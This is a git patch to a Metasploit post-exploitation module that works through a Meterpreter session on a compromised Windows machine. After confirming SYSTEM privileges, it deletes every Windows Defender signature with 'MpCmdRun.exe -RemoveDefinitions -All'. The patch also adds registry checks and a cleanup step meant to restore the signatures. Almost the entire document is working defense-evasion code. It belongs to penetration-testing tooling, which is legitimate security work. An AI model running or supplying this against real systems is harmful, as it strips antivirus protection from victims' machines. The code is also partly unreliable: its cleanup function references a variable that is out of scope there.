From 1304f93f1f9e0186a3c6d93c40eaca37fa12aaac Mon Sep 17 00:00:00 2001
From: bwatters-r7 <bwatters@rapid7.com>
Date: Thu, 29 Nov 2018 10:39:46 -0600
Subject: [PATCH] Add more checks and a cleanup function

---
 .../disable_windowsdefender_signatures.rb     | 38 ++++++++++++++++---
 1 file changed, 33 insertions(+), 5 deletions(-)

diff --git a/modules/post/windows/manage/disable_windowsdefender_signatures.rb b/modules/post/windows/manage/disable_windowsdefender_signatures.rb
index c8faa3d638..013e32edbd 100644
--- a/modules/post/windows/manage/disable_windowsdefender_signatures.rb
+++ b/modules/post/windows/manage/disable_windowsdefender_signatures.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry
 
   def initialize(info={})
     super( update_info( info,
@@ -24,16 +25,43 @@ class MetasploitModule < Msf::Post
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       ))
+    register_options(
+      [
+        OptBool.new('AUTO_CLEANUP', [ true, 'Attempt to return protections after session exit', true ])
+      ])
+
   end
 
   def run
-    unless is_system?()
-      print_status("Remove Definitions Windows Defender")
-      file_path = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"
-      if exist?(file_path)
-        cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+    #Are we system?
+    if not is_system?()
+      fail_with(Failure::NoAccess, "You must be System to run this Module")
+    end
+    #Is the binary there?
+    program_path = session.sys.config.getenv('ProgramFiles')
+    vprint_status("program_path = #{program_path}")
+    file_path = program_path + '\Windows Defender\MpCmdRun.exe'
+    vprint_status("file_path = #{file_path}")
+    if not exist?(file_path)
+      fail_with(Failure::NoAccess, "#{file_path} is not Present")
+    end
+    #Is defender even enabled?
+    defender_disable_key = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
+    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, "DisableAntiSpyware", REGISTRY_VIEW_NATIVE)
+    if disable_key_value.nil? || disable_key_value != 1
+      print_status("Removing All Definitions for Windows Defender")
+      cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+      if cmd.include?('denied')
+        print_bad("#{cmd}")
+      else
         print_status("#{cmd}")
       end
+    else
+      fail_with(Failure::BadConfig, "Defender is not Enabled")
     end
   end
+  def cleanup
+    cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -SignatureUpdate")
+  end
 end
+0